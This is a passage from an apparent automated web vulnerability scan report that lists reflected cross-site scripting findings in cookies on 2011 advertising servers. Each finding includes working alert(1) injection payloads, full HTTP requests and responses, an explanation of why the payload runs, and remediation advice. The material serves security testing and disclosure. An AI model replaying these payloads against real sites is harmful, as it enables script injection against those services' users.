Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=14341e<script>alert(1)</script>faac9635f42; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
5207&arc=178113566&', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "BMX_G": 'method->-1,ts->1304954985', "ar_s_p81479006": '14341e<script>alert(1)</script>faac9635f42', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19
...[SNIP]...

2.157. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into the response, which is served as application/x-javascript, inside a double-quoted JavaScript string literal: var zzStr = "s=1;u=...;z=" + Math.random(). The payload 2b78a"-alert(1)-"9b5e3cf9810 was submitted in the ZEDOIDA cookie and was echoed unmodified.

This proof of concept demonstrates script execution, not merely reflection: the double quote in the payload closes the literal, the remaining -alert(1)-" is evaluated as part of the expression, and the text that follows reopens a literal so the statement stays syntactically valid. Any page that loads this script with the poisoned cookie runs the injected code. Note that the same value is also echoed a few lines earlier inside a single-quoted literal (zzuid='...'), where a double quote is inert; the double-quoted occurrence is the exploitable one.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user: an attacker first needs a means of setting an arbitrary cookie value in the victim's browser. The cookies in this response are scoped to .zedo.com, so a cookie written for that parent domain from any host under it would be sent with this request. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context, for example by moving the value out of the script into a JSON response the script fetches or a data attribute it reads. Where the value must be embedded, it should be emitted as a JavaScript string literal produced by a serializer that escapes quotes and backslashes and hex-escapes <, >, & and the U+2028/U+2029 line terminators, never by concatenating the raw value into a hand-written literal as this response does.

Request

GET /bar/v16-406/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~0423112b78a"-alert(1)-"9b5e3cf9810; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=157
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:12 GMT
Connection: close
Content-Length: 2010

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...
AABN~0423112b78a"-alert(1)-"9b5e3cf9810';

var zzhasAd=undefined;


                                                                                                       var zzStr = "s=1;u=5ajh4goBADQAAFjiiCYAAABN~0423112b78a"-alert(1)-"9b5e3cf9810;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

2.158. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fmr.js

Issue detail

The value of the ZEDOIDA cookie is copied into the response, which is served as application/x-javascript, inside a double-quoted JavaScript string literal: var zzStr = "s=1;u=...;z=" + Math.random(). The payload 1e3ff"-alert(1)-"a1e8393f137 was submitted in the ZEDOIDA cookie and was echoed unmodified.

This proof of concept demonstrates script execution, not merely reflection: the double quote in the payload closes the literal, the remaining -alert(1)-" is evaluated as part of the expression, and the text that follows reopens a literal so the statement stays syntactically valid. Any page that loads this script with the poisoned cookie runs the injected code. As in the fm.js entry, the value is also echoed earlier inside a single-quoted literal (zzuid='...'), where a double quote is inert; the double-quoted occurrence is the exploitable one.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user: an attacker first needs a means of setting an arbitrary cookie value in the victim's browser. The cookies in this response are scoped to .zedo.com, so a cookie written for that parent domain from any host under it would be sent with this request. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context, for example by moving the value out of the script into a JSON response the script fetches or a data attribute it reads. Where the value must be embedded, it should be emitted as a JavaScript string literal produced by a serializer that escapes quotes and backslashes and hex-escapes <, >, & and the U+2028/U+2029 line terminators, never by concatenating the raw value into a hand-written literal as this response does.

Request

GET /bar/v16-406/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~0423111e3ff"-alert(1)-"a1e8393f137; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1;expires=Wed, 08 Jun 2011 15:36:10 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=159
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:10 GMT
Connection: close
Content-Length: 2052

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...
zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~0423111e3ff"-alert(1)-"a1e8393f137';

var zzhasAd=undefined;


                           var zzStr = "s=1;u=5ajh4goBADQAAFjiiCYAAABN~0423111e3ff"-alert(1)-"a1e8393f137;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

2.159. http://ib.adnxs.com/acb [acb145072 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /acb

Issue detail

The value of the acb145072 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d50b6'%3balert(1)//f3c67e09f9f was submitted in the acb145072 cookie. This input was echoed as d50b6';alert(1)//f3c67e09f9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /acb?member=311&width=728&height=90&pb=280&cb=2507990&referrer= HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acb145072=5_[r^kI/7ZVO@Lm*bfY>AYR8I?enc=FK5H4XoUCkBFtvP91HgHQAAAAKCZmfk_Rbbz_dR4B0AUrkfhehQKQNspbpGFnStGSsYda6b2ziUcCshNAAAAACgjBgA3AQAAHgAAAAMAAAAmSAUAar8AAAEAAABVU0QAVVNEANgCWgCqAQAA3xABAgUCAAUAAAAAfyE2KQAAAAA.&tt_code=cm.rub_usatoday&click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtizsOgEAIBa.yobYAHp9dz7SxszLeXUisZiYPHgLoHMGSxyBou6yYUiUV5OwBnsoIW2G8FNSXvaUrZ1e_adF_WvG69y6NUjOX9wMmshRf%26redirectURL=&pixel=http://va.px.invitemedia.com/adnxs_imp%3FreturnType=image%26key=AdImp%26cost=$%7BPRICE_PAID%7D%26creativeID=113105%26message=eJwtizsOgEAIBa.yobYAHp9dz7SxszLeXUisZiYPHgLoHMGSxyBou6yYUiUV5OwBnsoIW2G8FNSXvaUrZ1e_adF_WvG69y6NUjOX9wMmshRf%26managed=falsed50b6'%3balert(1)//f3c67e09f9f; sess=1; icu=ChIIhboCEAoYASABKAEwnZSg7gQQnZSg7gQYAA..; acb933293=5_[r^kI/7Zw[-!!0nf8MAYR8I?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jPzF8xuA56TROSsYda6b2ziUdCshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAAFBABAgUCAAUAAAAA6yROvQAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955445%29%3Buf%28%27c%27%2C+61473%2C+1304955445%29%3Buf%28%27r%27%2C+272040%2C+1304955445%29%3Bppv%287166%2C+%275635385468540845105%27%2C+1304955445%2C+1336491445%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; uuid2=2724386019227846218; 
anj=Kfw)(CZ#0c)_VtN.!fFc)4A9CkOy>5#Y2:H9+'(s':?6bLT2bujaqZM1q=3$<oxAN2R+-Q=f*ZD9q01F/yR!pPep@lhr?6lR5#u^LepX@-Bq@%t>BCt6LR9nqEku7!%x^cbAH:CBp4SoB_g)flf'+AW^8$vA%+R@BlT0>Og>^(#8Df^Mjo0*A?Rk8fO`zgI/(/6j]*nXBx`1s6=M3kv/VxS`aeS9/q?'v_7C+:@wG$N2=H<:IL#14#$D?40tLzI7=H'2$jLWN7CRm/8$vYZ!X@-8eFH`<@QU6Hj+1jDBpEB`8OjKb'GjgX8RAnuKCH.)XGBs/J*S:!cS[S?s$.iZwpczluvIHD7:hcBh=OMr6>JCzU3a>.GYzcjXc/wl$jxr6gM]N:Juk`F$fOJ>VqTH878oNWsnzJf=VOiSkZWN62OH1jwf[jvq%+U<RPfFF?JO'GuCZTEo.S'$TmrW>o(Q%@XomCXfdO.cX7MxB^OTpJ)U_<-[pmSCx0$Tnvy]D=wvcAfmROfiaS6^vmJJpx.1]4YgsAD[$hbMf827(omrkIHMu4m(=%V4yO-<vwSX0@uimPr?_!$6mB1.>xJj+Km$psS8m[pFyvxb1!cI4mu./=I>2v+AHbIE.bvpEgK*U.!FLR(G7Qv#Y*

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:37:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb145072=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:37:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0s(F?Mc9aQ3p9'^<S@I)Ql?!>Ae1f''iDi%3^'oLfC].kus@gU@%TxzHNX4[`WiVr*#9$vly>pFw2R!S3(%@w4<XPfGwI=KFxaLe[#mlK'C6EcG7hQU*o4SxrFd%j8zSG'hZ^D=OGMdEBEY11Uo_(eivJEYD@Ho?(^)etsLR7z'ns49!Ux5mR>#lMG'iLd<GTD$#AwtORJ@vBPA8q:p2Hv8s$nLSw`@cT6'=rqvg/PJyYt[-L!L(s`](-sRB6bA$j7/8l`/qMkYNHmLjx!j+Cat8-(!nXx8T`oWuF:Y11:LvJSN%2pSV-#:g'=Sb.-<6h+YEM%gG@w_9^gcM7pD=!j6CenGiB7>kko?i=<)!e3YI4KDvQEb`X8)alPKr$ETqBnzTMkQg+%-)erfq'IW*l8wrT7cUm4]3SP4j+tx.U-$'YUm@*y6x(A3H+*S0$getvNu.MeHeUf-#2%G*>DY/A<By?VIzutD*g8cKK+`6>[DwWqbhOid^wC>`:mn[J>?-#Fp6<W)3Xikw.$@ePbWiO6d:_'xt%OTZIzzfW[Loft(ZmLx[_-MtHVG'T'sPt9ssVv3fjt4@6bcwvH%-]h'oo`t?2P/4nA!gq([Ift!^HL*Xe]Z0f#*hQ*v9^cJiiW^]P3'vI-$iNx:M; path=/; expires=Sun, 07-Aug-2011 15:37:21 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 15:37:21 GMT
Content-Length: 2869

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">function writeJS(doc){
var str='';
str += '<script type="text\/javascript"> \n';
...[SNIP]...
m/adnxs_imp?returnType=image&key=AdImp&cost=3.260000&creativeID=113105&message=eJwtizsOgEAIBa.yobYAHp9dz7SxszLeXUisZiYPHgLoHMGSxyBou6yYUiUV5OwBnsoIW2G8FNSXvaUrZ1e_adF_WvG69y6NUjOX9wMmshRf&managed=falsed50b6';alert(1)//f3c67e09f9f" width="1" height="1"/>
...[SNIP]...

2.160. http://ib.adnxs.com/acb [acb893170 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /acb

Issue detail

The value of the acb893170 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e655b'%3balert(1)//a0760bdba82 was submitted in the acb893170 cookie. This input was echoed as e655b';alert(1)//a0760bdba82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /acb?member=311&width=728&height=90&pb=280&cb=2578662&referrer= HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChIIhboCEAoYAiACKAIw4pSg7gQQ4pSg7gQYAQ..; acb893170=5_[r^kI/7ZVO@Lm*bfY>WiRT8?enc=FK5H4XoUCkBFtvP91HgHQAAAAKCZmfk_Rbbz_dR4B0AUrkfhehQKQFOF0tqw0VJASsYda6b2ziViCshNAAAAACgjBgA3AQAAHgAAAAMAAACHbQUAar8AAAEAAABVU0QAVVNEANgCWgCqAQAA3xABAgUCAAUAAAAATCPKqQAAAAA.&tt_code=cm.rub_usatoday&click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtizsOgEAIBa.yobaAfY8leKaNnZXx7kJiNTN8HgHkHEstjiGY7ZZuWWUVwgVmhk8qAGq4S1_2rqYaXf02i_6Txeveu3SVkm7vBykHFGc-%26redirectURL=&pixel=http://va.px.invitemedia.com/adnxs_imp%3FreturnType=image%26key=AdImp%26cost=$%7BPRICE_PAID%7D%26creativeID=114297%26message=eJwtizsOgEAIBa.yobaAfY8leKaNnZXx7kJiNTN8HgHkHEstjiGY7ZZuWWUVwgVmhk8qAGq4S1_2rqYaXf02i_6Txeveu3SVkm7vBykHFGc-%26managed=falsee655b'%3balert(1)//a0760bdba82; uuid2=2724386019227846218; anj=Kfw)(CZ#0s(F?MZ/Hw6M9'^<S2U@!:?!=5D/#m45DLc)]:#m<jG2QY%)hRUPZ6.4!Cb0i9=?30.f`PjN%)NSM//kC0GfkcGYCO$HhF^d['nn-tv@#2kF)yOv%i`W#'w@pXWlbX@KozXV?P%j2mWi''mY$RtWOF<qF)@r6l88[dN]UG=Cg'6e=Kr)o.lNx7D2455k84Xt8<q%R/M)Q=p!SOLo6tu%S_EeJ^:GYD4TUGhUm4.CNgIbZX.*re6y<W$9sinfkZpOX#nFRnlBD8wa<kDbX0b$=`p+d7!7BSY%A(+T1-o5S0z_Rd^<NMU_QC#:#.T^Pf$7NQIiv+vrUEZz?ev<SSWGAY$oK=Fv^a5y+e@0%>@s0.tp=06u`%C+I55#E`PitRt]Iybk+9_<RyC)=CdC*pD7Y?1ZyJIf.Td9aL+-m+X9eObnVw>-bFl([SwBJV$s(QxCPo=+Hxahx8F%6Up#-z[(vtS^9b>:Y8LjKq]1lgr4Gt2k:9?S<LQEXV.U+CsRZJJxfIcVy9O)ng(G7oG70.Svvb9D?J[!8F3#h)nmsRq!pN'v!t1(Wv+o8q!ljeG$lzm7.mX(XqI/.5#cJ*npWOxe@WJc(:Z?Glrik<f#h=MRDu^$G7q]fKvLsX*@iq2ohfr2k*HmPV[x.bB)wC$/+le_]y

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:39:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:39:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb893170=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:39:01 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0s(F?MZ/Hw6M9'^<S2U@!:?!=5D/#m45DLc)]:#m<jG2QY%)hRUPZ6.4!Cb0i9=?30.f`PjN%)NSM//kC0GfkcGYCO$HhF^d['nn-tv@#2kF)yOv%i`W#'w@pXWlbX@KozXV?P%j2mWi''mY$RtWOF<qF)@r6l88[dN]UG=Cg'6e=Kr)o.lNx7D2455k84Xt8<q%R/M)Q=p!SOLo6tu%S_EeJ^:GYD4TUGhUm4.CNgIbZX.*re6y<W$9sinfkZpOX#nFRnlBD8wa<kDbX0b$=`p+d7!7BSY%A(+T1-o5S0z_Rd^<NMU_QC#:#.T^Pf$7NQIiv+vrUEZz?ev<SSWGAY$oK=Fv^a5y+e@0%>@s0.tp=06u`%C+I55#E`PitRt]Iybk+9_<RyC)=CdC*pD7Y?1ZyJIf.Td9aL+-m+X9eObnVw>-bFl([SwBJV$s(QxCPo=+Hxahx8F%6Up#-z[(vtS^9b>:Y8LjKq]1lgr4Gt2k:9?S<LQEXV.U+CsRZJJxfIcVy9O)ng(G7oG70.Svvb9D?J[!8F3#h)nmsRq!pN'v!t1(Wv+o8q!ljeG$lzm7.mX(XqI/.5#cJ*npWOxe@WJc(:Z?Glrik<f#h=MRDu^$G7q]fKvLsX*@iq2ohfr2k*HmPV[x.bB)wC$/+le_]y; path=/; expires=Sun, 07-Aug-2011 15:39:01 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 15:39:01 GMT
Content-Length: 2748

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">function writeJS(doc){
var str='';
str += '<script type="text\/javascript"> \n';
...[SNIP]...
m/adnxs_imp?returnType=image&key=AdImp&cost=3.260000&creativeID=114297&message=eJwtizsOgEAIBa.yobaAfY8leKaNnZXx7kJiNTN8HgHkHEstjiGY7ZZuWWUVwgVmhk8qAGq4S1_2rqYaXf02i_6Txeveu3SVkm7vBykHFGc-&managed=falsee655b';alert(1)//a0760bdba82" width="1" height="1"/>
...[SNIP]...

2.161. http://k.collective-media.net/cmadj/cm.rub_usatoday/ [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.rub_usatoday/

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1063'%3balert(1)//73c0ac01910 was submitted in the cli cookie. This input was echoed as d1063';alert(1)//73c0ac01910 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.rub_usatoday/;sz=728x90;net=cm;ord=[timestamp];env=ifr;ord1=310802;cmpgurl=http%253A//www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
